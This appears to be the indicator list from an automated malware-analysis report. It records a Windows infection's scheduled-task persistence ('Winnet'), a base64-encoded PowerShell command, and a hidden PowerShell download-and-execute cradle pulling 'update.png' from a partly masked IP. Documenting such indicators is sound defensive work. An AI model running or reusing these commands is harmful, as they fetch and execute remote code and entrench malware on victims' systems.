Technical Information
- <SYSTEM32>\tasks\winnet
- http://18#.#66.162.201/update.png?&m###################################################################################################
- '18#.#66.162.201':80
- '<SYSTEM32>\getmac.exe' /FO CSV
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 45 /tn Winnet /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQB...
- '<SYSTEM32>\schtasks.exe' /run /tn Winnet
- '<SYSTEM32>\cmd.exe' /c powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).downloadstring('http://18#.#66.162.201/update.png?&m##################################################################...